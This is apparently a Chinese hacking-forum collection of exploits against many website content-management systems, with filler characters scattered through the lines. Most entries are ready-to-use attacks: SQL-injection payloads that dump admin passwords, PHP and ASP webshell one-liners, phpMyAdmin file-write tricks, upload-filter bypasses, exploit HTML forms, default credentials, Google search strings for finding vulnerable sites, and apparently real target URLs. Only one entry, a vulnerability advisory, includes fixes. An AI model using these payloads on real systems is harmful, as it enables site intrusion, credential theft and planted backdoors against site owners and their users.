启航企业建站系统 cookie注入漏洞通杀所有版本& i, i, \0 m1 O
4 I0 B4 J( [6 M m% S8 z
直接上exploit:
) h1 n0 L0 {4 b7 p5 L5 njavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));5 r9 R% U# I% M- y* T
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
" d; W: _, z$ Y# t) k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 S' s; J2 H/ cAsprain论坛 注册用户 上传图片就可拿到webshell4 a4 S3 ?# S, m. |$ G
1 M, ~( { d* L, J: x/ V" v
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。$ |) x! R8 Y/ U
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>" V& D" D' L# \" T6 K. O7 G- e
2.gif 为一小图片文件,一定要小,比如qq表情图片
6 U9 i: q# \6 j- e) V( k3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
: H* E' n/ L2 |4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了) {0 S+ y- U8 @4 h
5.q.asp;.gif
& j/ R6 E D1 n" V3 W4 zgoogle:Powered by Asprain
* U6 ^+ l' Z3 j+ ]. I+ z8 p+ q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ Z8 ~, |8 \0 e
1 W/ }& d' u+ f/ I
ShopNum1全部系统存在上传漏洞。: @( _ X) \+ i
, O, f% Z' ?% V3 B6 r首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。: R$ r& P0 t. i: ]5 V
按说明 提示登录后台。。% Q6 \/ M' }' Y3 K
在后台功能页面->附件管理->附件列表6 }; v8 O( i& g$ ^
可以直接上传.aspx 后缀木马1 f8 K( h' V/ A
http://demo.shopnum1.com/upload/20110720083822500.aspx' r2 r. | F; \* Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% w3 C `, r. m m- b5 ^& k' z3 G' f
* d H% Z1 y, J6 Q) R% _
牛牛CMS中小企业网站管理系统 上传漏洞) _" {0 ~0 X$ h6 p3 y+ X
* r# }: m# s1 B$ L
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
1 z) s. ?/ O+ ?3 g0 i后台:admin/login.asp( k+ I, h( F1 a5 U5 ?
ewebeditor 5.5 Nday/ ^# b3 ]9 O4 v1 n; V& M
exp: I# t4 s' J. `# J' d
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?; K+ n1 T! [4 d$ e0 G
<input?type=file?name=uploadfile?size=100><br><br>?7 M5 c6 A7 b- I" Z* U1 z
<input?type=submit?value=upload>?
! Q3 n) o$ n; x: ]3 v7 Q+ e& ^& @</form>
+ U7 a! K W( F1 S Vps:先上传小马.
: d7 h! g c& ^2 A8 E2 Uinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏; |- g* n2 }" I
3 [1 t* D+ m' ]0 N9 g Z' |6 M" {! g* _--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! A! M) o9 s( b3 k6 @! t4 B0 ~0 x! p2 d- \0 @
YothCMS 遍历目录漏洞
: m1 k& j; Z9 V$ V& K4 Y
& B" C. J! ?5 x* ]2 {优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。1 c( `8 I, @ ?( K9 d6 s
默认后台:admin/login.asp
# @" n0 [* j/ W/ B遍历目录:
4 _2 b; t: A0 |9 {" z# ]1 Q6 Zewebeditor/manage/upload.asp?id=1&dir=..// n/ ]! }7 `0 X
data:% I1 o1 J2 {1 U: ~4 a# ^
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
1 Y6 W# N: n- `7 N+ s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 n" K2 d" \0 t3 n* Z) d
. L' ?- t' B$ X G K
Net112企业建站系统 1.0
! l& d- y7 q7 I/ A+ W& `) |/ i7 n s. s1 z/ E# R5 m1 Z4 B% `. m7 W
源码简介:
% t9 G# G# K! A2 K5 q- L/ q% `Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
3 K2 \6 Q$ n2 `4 h添加管理员:
4 Y, i3 w1 [( |3 m% Ohttp://www.0855.tv/admin/admin.asp?action=add&level=24 v% Y! Z6 `! i% C. X
其实加不加都不是很重要,后台文件都没怎么作验证。$ H% e: o, j5 f& ~' l* v! d
上传路径:; x6 l. o2 J8 e2 ^9 J+ J
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
t% F5 U7 I' ~! R& Uhttp://www.0855.tv/inc/Upfile.asp?Stype=21 r; S3 P5 k" n
怎么利用自己研究。5 z, z6 v, i2 a5 V5 X/ ]. Z/ B" ^
遍历目录:
! j }0 Q# |4 d' vhttp://www.0855.tv/admin/upfile.asp?path=../..
: r2 \$ A J$ P. ?: j ^' w如:
& h! Y! h, O7 g0 {; k K! R- phttp://www.0855.tv/admin/upfile.asp?path=../admin: b: R. f! \+ O- |+ a/ `9 k
http://www.0855.tv/admin/upfile.asp?path=../data) f' H2 g2 w; m( d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: y# p% S: q1 [: G
9 K1 M9 I; B$ l1 ~3 B2 Z) z
易和阳光购物商城通杀 上传漏洞* V5 h! L2 W' `1 }
( z6 e! A2 | ?4 `) v
前提要求是IIS6.0+asp坏境。) e Y+ Q$ ]' U4 t
漏洞文件Iheeo_upfile.asp
+ n0 Z v; S0 `& M' G. y/ ]过滤不严.直接可以iis6.0上传5 D& k; x# ^+ i6 Y$ n
把ASP木马改成0855.asp;1.gif: `3 A# ~ Q( @2 L6 l) a
直接放到明小子上传" B3 n6 g( L% s! K
Google搜索:inurl:product.asp?Iheeoid=( o" v% q; V) z+ V/ l% J; U- D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# B6 ]# r& C* x: o
# A' F8 b* E* ~ U4 D' G$ d& hphpmyadmin后台4种拿shell方法
6 |0 a+ e# o$ A/ P* m6 d% _
3 y* h3 Q9 i! Q' v方法一:
& `8 x# o; K7 Q. A( g o" WCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
3 P/ n( H: l* z4 dINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');/ w! _8 T' \# [
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
( S( I- b* @' `1 \6 C----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
5 n; l; E* u% ]9 T6 V一句话连接密码:xiaoma) A) z( d5 @: |& d
方法二:
0 o# g$ o9 c% d6 e% Q! ~, UCreate TABLE xiaoma (xiaoma1 text NOT NULL);% V) V' q8 v. `7 @. @
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
4 b$ z' U) v! Iselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';4 Y" M3 @! h6 `1 j
Drop TABLE IF EXISTS xiaoma;, `3 [ m' ?3 ]) _4 o
方法三:
+ ]0 g& m- \- P# D1 q读取文件内容: select load_file('E:/xamp/www/s.php');
# O' ~/ b, n- f写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'& x% E' Y, W2 F% t1 S
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php') Y J/ `/ H/ B8 u0 D2 y
方法四:/ Z" A( s7 n6 g* p/ ^
select load_file('E:/xamp/www/xiaoma.php'); |1 C/ \. l7 K
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
7 x/ I# b! }$ Y* S/ I1 ]然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
- d1 p5 H @7 t9 b* t" q% g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. l. d0 J& C5 ?$ b+ M Y
) M5 w$ N# f; f6 C- G Y1 y传信网络独立开发网站源码0day漏洞6 R/ r+ S) G$ P2 h( {- P4 t
4 z# ^( Y: Q& g, S e7 r1 s5 o: p
后台system/login.asp
T J+ r9 d% Z' K进了后台有个ewebeditor3 u" Y c) S* b
Google 搜索inurl:product1.asp?tyc=
" G' X) Q! O* F5 [编辑器漏洞默认后台ubbcode/admin_login.asp+ F) x- f6 s/ q; q; z6 z3 Y: U5 h# R+ U
数据库ubbcode/db/ewebeditor.mdb6 ~+ y' L8 J5 L) u( x
默认账号密码yzm 111111
- J. ~4 c( u0 P0 g$ P
3 U- O/ y# n9 b6 O2 `: S拿webshell方法
$ c- L* X% H- [/ a登陆后台点击“样式管理”-选择新增样式
- m' g% T% B# I& A$ F6 J样式名称:scriptkiddies 随便写 4 ~+ H0 W$ ~$ C1 ~+ R
路径模式:选择绝对路径
5 u8 v' n) X2 W8 j1 C图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
( j, [3 J& B% y i( M图片类型比如就是我们要上传的ASP木马格式
: T6 x& J4 Z. e2 M. W( O上传路径:/
! f9 i% M) W/ ]图片限制:写上1000 免的上不了我们的asp木马# \5 l! O1 p7 E
上传内容不要写
" _, |* n- i5 e可以提交了 ) `' i; z& O! P! z+ \7 J2 z
样式增加成功! " C' I% U2 D6 p' m( p$ u
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
5 }; F4 l8 l! X6 B按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置 B' S* r: j, i \ T
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies* o, ]5 F, \8 k# t
上ASP木马 回车 等到路径
/ Z$ f" N2 w( o' ~1 ]1 n/ E. Z( {* Z, v
后台:system/login.asp
$ ~' G+ g$ [6 G OExp:8 E! A$ y, X& Z l5 s9 `
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master, _$ a) ~2 ^( o5 z( u
测试:# ]( N6 O. w. q$ h* S
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master& u6 k. P$ j: [! b$ E1 A* p
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
' h- v2 g9 @' @ l& l* @1 A+ L. ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 W) J4 L: L+ s, K* L7 y# N# |- S, R0 V- \% G
foosun 0day 最新注入漏洞
# J a3 Q) o E/ X7 p& W; S2 }' \2 a5 O' m, F2 w! y! c1 M
漏洞文件:www.xxx.com/user/SetNextOptions.asp
. d$ e1 Q+ c4 e4 r* {" }7 f, z利用简单的方法: m4 \5 m2 \9 y g, x# V
暴管理员帐号:# n. j: q: f$ F0 w# Z! R% D$ u
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
- ?7 G& B1 R2 I( ]! T' u/ ?暴管理员密码:
' t1 | W! d: s, l1 [http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
* J* A8 ?4 S% V% u3 a: a' q7 B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, J9 t' r# l4 F& v I+ T7 h
; S$ w) ^) }* w4 ^4 h网站程序的版权未知!
9 U; e/ K* E8 `# s" |1 v" l' Q
4 f1 I% r3 c6 }# x( w: k默认网站数据库:0 W6 h, Z3 F: h
www.i0day.com/data/nxnews.mdb' y3 L1 a6 o, e( @9 J! x( j
ewebeditor 在线编辑器:- S% r. C# h/ @ @$ j
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
9 g: `! u+ M/ n) q3 |1 o登录地址:ewebeditor/admin_login.asp
]7 r' J( m7 y) Q# n默认密码:admin admin
1 F4 B& Q5 n3 i0 f登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
2 ?- x( |7 D% m6 @
, E% `4 i+ a; S& {Sql注入漏洞:# A; B" m8 w# ~& I+ s2 Z
http://www.i0day.com/detail.asp?id=120 v4 u$ q& V& n& f
exp:
+ r% n6 E* B% e% A& f8 g+ o% x; M" Funion select 1,admin,password,4,5,6,7,8 from admin! V4 m7 j m2 G/ Y
爆出明文帐号/密码
3 Z. V1 b. e/ v7 x2 U" j3 ^1 |; B) K% r
上传漏洞:
' i. m5 N8 t3 z5 @, k# M后台+upfile.asp; l. S& q9 _. ~/ Y) c5 P; g
如:2 c0 y) z- @0 I! k8 u# b+ a2 T+ K
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
+ j% g8 K) R/ G& Vshell的地址:网址+后台+成功上传的马5 i) |0 J7 F! Z* ^6 n
google:inurl:news.asp?lanmuName=4 D% P) a) X' R, `, L7 @" q
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 T' t7 _" m8 ?* w9 R: L. p+ [' S% O
# S% h* i) D5 T# e9 g+ s" @4 Ddedecms最新0day利用不进后台直接拿WEBSHELL
& h9 b( y0 k, l0 f7 m: c2 U/ U: _# |3 y! Q6 H. n$ ]2 A5 ?
拿webshell的方法如下:- [' Y7 b) w% o
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.8 g4 o$ R- j) Q0 c; T* N3 c, k% H
前题条件,必须准备好自己的dede数据库,然后插入数据:
/ h0 A. _* T" ?: p% @! p1 }* A7 Rinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
^9 C M* P8 h' \
5 B+ Q: f6 F5 j9 w2 f$ p( ?再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。0 C/ q) |: M$ Y% T) j3 k# f
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">" v& i3 t! \3 H1 N( K' y% q; M
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />/ ~9 U5 [+ J$ M! S! [6 m) T7 l
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />7 T5 \$ b/ o$ L& k" M
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />' u+ `8 z% D( \& l
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
2 k/ a5 u, G% A& Y( s# I. y<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />) j% d: o, i: }
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />5 J% b+ @$ V( u) k6 o2 W6 k
<input type="text" value="true" name="nocache" style="width:400">! p' s B" x$ V2 A
<input type="submit" value="提交" name="QuickSearchBtn"><br />
" ?& Y+ p' _- W& l- f</form>) c6 O+ i9 ^' S
<script>6 k! W1 Y6 ~/ w. C% Q
function addaction()8 R! \4 X/ l: C) ~
{# T3 K o) p! p$ g
document.QuickSearch.action=document.QuickSearch.doaction.value;
0 b% z& [4 T7 u) V) l) _3 Y# o. Z1 O}) _( U6 x5 F7 t1 {
</script>, s5 Y( |3 e* z) ?/ S- U( Q
-----------------------------------------------------------------------------------------------------------------------------------------------
8 Z" U+ O+ [0 k! l7 l0 k0 l' }8 I% r6 [# E
dedecms织梦暴最新严重0day漏洞1 ~2 M0 O; L, s
bug被利用步骤如下:
/ o; \& F0 b/ F3 G) Zhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
$ D8 v; r! s/ s/ V9 F0 a2 y把上面{}上的字母改为当前的验证码,即可直接进入网站后台。' C/ G" f8 r& |0 ~. P! x! x5 W
-------------------------------------------------------------------------------------------------------------------------------------------
& k" J) j+ D( _2 C" W# U, t; @9 [* {+ C" J! f T& P
多多淘宝客程序上传漏洞
: }0 H3 q' V8 u6 Y' f漏洞页面:8 H7 i4 T5 k' I& c
admin\upload_pic.php7 @9 _7 |8 h. W9 [" F s
传送门:* J/ z! Q0 ?8 t' z$ ?
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
% t0 S& Q- w2 x7 Y- T( m+ Z" q* YPS:copy张图片马 直接 xxx.php 上传抓包地址!
& N8 l( g: W: d) Q# [3 q------------------------------------------------------------------------------------------------------------------------------------------------------
3 G+ y3 ~7 \/ Y2 ~4 n. X# h' a1 M, C, ?$ R7 T* u7 d) r) \
无忧公司系统ASP专业版后台上传漏洞" p, ]5 Z6 N3 x. L" A
漏洞文件 后台上传8 s9 _, ~4 F/ K/ j
admin/uploadPic.asp! A' P9 e5 v% s; L
漏洞利用 这个漏洞好像是雷池的 w6 Z: n$ J( T2 |) e
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1( J4 i9 L4 W2 f7 s/ m9 a4 x
等到的webshell路径:5 q' i6 d) o$ f- E& G i, h
/UploadFiles/scriptkiddies.asp;_2.gif
) q' ~* r$ q' i8 X& O---------------------------------------------------------------------------------------------------------------------------------------------------
0 y9 o$ U+ t- u9 P0 A4 d6 F* v- B6 A0 M
住哪酒店分销联盟系统2010( K4 B4 [1 D% I1 A4 j( l
Search:
. Q8 ^+ }5 ~: W: Cinurl:index.php?m=hotelinfo) m, |$ G* q& \; M5 U- t
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin: H& @, @3 }# t' h
默认后台:index.php?m=admin/login4 i" x; M' g6 R5 j
--------------------------------------------------------------------------------------------------------------------------------------------------
* l K$ g# T4 N
# ]$ \, c! ~- }' V+ m( L; E# Yinurl:info_Print.asp?ArticleID=$ \+ a* W/ X C
后台 ad_login.asp
+ Y- J! h+ w: u S, y" |$ n爆管理员密码:3 Q3 t1 H4 e" z5 o; C1 w7 C
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin- V% ] e" j! M* `
------------------------------------------------------------------------------------------------------------------------------------------------------------
/ w: E9 Z) D2 w; O [& ?6 V' a7 @
- x3 ]- J6 V6 p+ o搜索框漏洞!
$ F5 W/ C: k/ Y8 R%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='. G S) H3 M0 q T# j c2 u
--------------------------------------------------------------------------------------------------------------------------------------------------------3 {3 t6 h7 n- F6 {1 |# j
1 d7 [+ K' v9 b& u
关键字:% g5 e; w3 N# w% S
inurl:/reg_TemletSel.asp?step=2
1 ~0 n+ u1 u. Z( ~或者
3 [4 a" Z0 o$ }+ u电子商务自助建站--您理想的助手# U/ ], ^2 _5 S3 S
-------------------------------------------------------------------------------------------------------------------------------------------------
5 k) R) O/ M' R% T% o+ [# Q' W. D
& I/ g/ `0 w) f7 W1 d0 `8 I2 AiGiveTest 2.1.0注入漏洞; i, v- @7 [, A- T. q7 ?( {
Version: <= 2.1.0
2 H: j+ g5 t6 S" m) e9 [* Q/ W4 \; Y# Homepage: http://iGiveTest.com/
' `0 F6 ^& \) V$ i2 ^- e: M谷歌关键字: “Powered by iGiveTest”, i5 ~* A, {( o8 T! ^/ H0 g
随便注册一个帐号。然后暴管理员帐号和密码8 }) m9 G" a, q) i7 c' ?
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1- s/ J# B$ |6 k, Q* g: p5 M5 ^5 V r
------------------------------------------------------------------------------------------------------------------------------------------------& ^ R+ r. H A! z' a( K: ]6 G6 S4 n
G3 k2 u: y( h* ~; x+ N
CKXP网上书店注入漏洞
1 f) m- _9 Y& f0 b! P8 c$ ~- \工具加表:shop_admin 加字段:admin
8 X$ p' }9 c5 R$ H3 A: x% y后台:admin/login.asp / \2 F8 M% x( t5 z: ?. S: x# M0 L
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/( a/ H3 p* R9 i( I& d
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
; I# n; u: B1 \. _3 g. X+ X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 L8 q4 p$ `% Y: \7 V& Z
7 c9 ?+ M2 g7 ]% `* {
段富超个人网站系统留言本写马漏洞( x1 F8 ]- p; q9 Q, P5 E
源码下载:http://www.mycodes.net/24/2149.htm
; ]( d2 d+ T5 paddgbook.asp 提交一句话。& Z3 u8 e8 r, ?; S4 c0 W# K. l
连接: http://www.xxxx.tv/date/date3f.asp/ f: Z( x) P4 R" d4 c
google:为防批量,特略!
! Z. \- y/ ~' A9 L5 g-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' G: C O, B6 a5 u6 G3 {
/ l8 E8 A+ o% D B智有道专业旅游系统v1.0 注入及列目录漏洞( c6 |* p W9 b" v
默认后台路径:/admin/login.asp
y# M& a5 N* g$ U+ x+ u- e默认管理员:admin
" `6 M6 X8 z1 g4 p# k, G默认密码:123456- g$ b8 O: |" X3 R1 J/ T }, [
SQL EXP Tset:6 |% w) d9 P& Y- ?+ e
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin2 @& b; j3 h4 j: E
------------------------------------------------------------------------------------------------------------------------------------------------------------------------; o" |6 c1 \/ T H+ s
1 G& G( T" N8 G
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
! A; f4 A/ ?4 \8 H# tEXP:
) e2 @, D2 V; y: E% K<title>eWebeditoR3.8 for php任意文件上EXP</title>2 t8 m) J Z1 n! `9 U; T W- A" _
<form action="" method=post enctype="multip. E, A. S9 P! h4 G
art/form-data">
( ~$ u d' j: u5 q( U$ x, M<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
- Y h0 z- v2 \. [; v+ \/ ~URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
' n J7 y9 _- |0 d# i% A: n<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
9 I; j3 H3 O* I6 r+ S1 vfile:<input type=file name="uploadfile"><br> 3 O7 r/ _9 |' T# l" }
<input type=button value=submit onclick=fsubmit()> / x8 a1 e6 u% y9 ~0 g9 z/ p
</form><br> - [2 ?5 k6 Z. \6 x5 S1 m
<script>
8 A. Q$ c# x" Q# d9 I9 N. dfunction fsubmit(){ , D l2 |1 w7 n+ I- V8 x" E, a2 T" V) A
form = document.forms[0]; - R) X3 _- H! M, q" D$ O
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
4 @, _, H) R, u! salert(form.action); 3 @; _, |4 s6 ^- {% ~4 O6 K
form.submit(); " s' R: e( Z# a7 W, w
}
! V0 a R( O0 _9 h+ y</script>
# X5 r% r0 P: Z% N! z注意修改里面ewebeditor的名称还有路径。
( }2 M2 j( q+ e9 R7 R- w---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 D6 U p- h3 X# L8 ] o+ x1 {; R2 |* F
提交’时提示ip被记录 防注入系统的利用1 z8 ?" ~7 f- c6 C
网址:http://www.xxx.com/newslist.asp?id=122′
- X) ~( V( q2 W7 e# t6 T提示“你的操作已被记录!”等信息。; Y7 e8 s/ p. s3 U) _7 D
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
X: h* b; p! H. z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 M( }7 g( y( n4 V' @0 x" i
$ f+ s. s& L0 f3 ]) U8 U6 o
西部商务网站管理系统 批量拿shell-0day
) Q; ~( x" t* ?) R2 p* k" I, A这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ! ?/ D" G" ], y* j) A* v; M+ y
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛$ `8 {, \! L8 j8 p1 ~
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
8 b% Y+ z8 b% v6 T3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂# b9 P. s9 r/ @5 N, D7 q
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 N. T5 U5 ~! r) I$ H& g
- h; Q* y5 f* L: C2 B2 O* g& `
JspRun!6.0 论坛管理后台注入漏洞! X* F% T7 J% \ E9 x7 U
P, g2 ~; \- t1 K; ~. J/ x8 n
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
# C% K+ }0 w. p9 P2 M* PJspRun!6.0
& Z+ J' V2 l0 Y0 M. J ` F9 Q漏洞描述:
' u, [# L N5 k( s' U- [3 bJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。8 b/ a# j3 ] u! ~8 g, U
在处理后台提交的文件中ForumManageAction.java第1940行: U1 x+ n) i Z) U) v
String export = request.getParameter("export");//直接获取,没有安全过滤
7 [# g- m$ A4 n+ X. R0 |if(export!=null){# \2 Y ]% P$ L' R }% w, j B |
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
& H9 F9 M/ Z' I& a; qif(styles==null||styles.size()==0){: L5 q5 S' i. L8 l- j* r+ }6 E
<*参考7 R8 ?) r q9 l) |1 U: Q" B
nuanfan@gmail.com' u+ P( k) s4 b1 C) x
*> SEBUG安全建议:
0 H9 a& @6 N7 A) gwww.jsprun.net
7 ]2 d/ m- X, S. j: m(1)安全过滤变量export
# d: Y2 I1 a6 u, L: a7 Q [# E G(2)在查询语句中使用占位符/ z) J7 K8 r, R4 Y5 [$ g1 m. J
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------! [/ W; B9 [6 G$ s; e; y+ H
1 J/ k3 d. Z( X- S
乌邦图企业网站系统 cookies 注入
& v; d1 ?+ {$ m4 R5 s: n# V4 T5 I7 L( K# g$ `' @( P1 E9 ~
程序完整登陆后台:/admin/login.asp6 b7 M# @% t& @# @
默认登陆帐号:admin 密码:admin888
+ h2 |0 b+ F5 j3 e语句:(前面加个空格)
" ~2 H( i+ |' ^, u( {! Y0 H3 Oand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin, [: j/ y, S* z% f% w* e
或者是16个字段:
# ?$ k6 W0 c1 Oand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
# |3 v! W1 _8 i爆不出来自己猜字段。! b$ U8 C( Z& ?' ?+ q9 i
注入点:http://www.untnt.com/shownews.asp?=887 }# T6 B. q7 D3 w6 ~* B
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp( X s' b* |4 q2 R
关键字:* k G8 H; Z$ G) |+ k4 d
inurl:shownews?asp.id=
6 z/ P, o2 S& ?8 r4 f/ L-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! Y) H; t+ l" B/ ^8 m2 J& @
, w+ O* [6 k9 g" S' ^! F4 eCKXP网上书店注入漏洞9 T1 |! d1 B+ e0 c$ N$ k: d* _" F
) ]. F1 [" n+ ]2 L; |& R5 j
工具加表:shop_admin 加字段:admin$ z& Z( i9 v4 F: F u
后台:admin/login.asp
! ~& `# ]7 k' V2 e$ i8 ^" Y登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/5 j5 K4 L' F$ L+ ]1 u
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息3 c" h' C& I( N4 R3 a3 l
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 a) Q. a+ P$ `/ T; d! n! R& @& z; X4 Z) d
YxShop易想购物商城4.7.1版本任意文件上传漏洞
$ p6 [, X; w0 O- C' b: u7 E5 o: V! C( E
( |+ q- F' A) k- Ahttp://xxoo.com/controls/fckedit ... aspx/connector.aspx! T# u3 z! Q* Y: A
跳转到网站根目录上传任意文件。1 I2 d& j, }# ~8 h6 i$ v
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件, O* h7 m8 w: V. K# \7 V! {
